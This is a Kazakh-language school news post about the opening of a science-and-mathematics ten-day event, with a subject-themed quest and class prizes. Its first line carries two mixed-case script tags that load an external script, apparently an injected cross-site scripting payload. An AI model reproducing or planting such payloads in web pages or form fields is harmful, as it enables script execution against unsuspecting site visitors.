<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.01.2017

Ғ. Әбдірахманұлы атындағы Қима орта мектебінде

жаратылыстану-математика пәндерінің онкүндігінің

«Білім патшалығына саяхат» атты ашылу салтанаты

Бүгін, 2017 жылы қаңтардың 18-нен 28-і аралығында өтетін онкүндіктің «Білім патшалығына саяхат» атты ашылу салтанатты жиыны болды.

5-11 сыныптың оқушылары фойеде жиналып, сол жерде тақырыптық кітап көрмесі ұйымдастырылды. Онкүндіктің жоспарымен жаратылыстану-математика бірлестігінің жетекшісі Саутбаева А. Б. таныстырды.

Жасыл баққа бөле туған жеріңді

Көк түтіннен қорға аспан көгіңді

Табиғатқа дос болардай сенімді

Біліміңмен ұшта жігер, күшінді –дей отырып, биология пәнінің мұғалімі Шаймерденова Г. М. онкүндіктің ашылуының жоспары мен ережелерімен оқушыларды таныстырып өтті. Онкүндіктің ашылуы мақсаты - «Хан сарайына жету». Бұл сарайға жеткенше оқушылар 5 патшалықтан тапсырмаларды орындап, сынақтан өтіп, жетон жинады. Олар: «Физика патшалығы», «Математика патшалығы», «Биология патшалығы», «Химия патшалығы», «География патшалығы». Осы патшалықтардан шыққан соң «Хан сарайында» әр сыныптың білімдері қорытындыланды. Хан үкімі бойынша үміткерлер марапатталды.

Оқушыларға сайыс өте ұнады, олар жақсы көңіл күйімен берілген тапсырмаларды орындап, кабинеттерді аралап жүрді. Ең бірінші «Хан сарайына» жетіп және ең көп жетон жинап, тәтті сыйлықты ұтып алғандар 5 сынып оқушылары болды. Марапатталған сыныптар: «Білгір сынып» - 6 сынып, «Зерек сынып» - 8 сынып, «Әйгілі жеңімпаз» - 5 сынып.

Онкүндіктің ашылуына жауапты мұғалімдер Оразбаева Б.М. мен Шаймерденова Г.М. үлкен дайындық жасады. Оларға шексіз алғысымызды білдіреміз.

Просмотров: 612


Пікір қосу



Деректерді қолтаңбаға қосу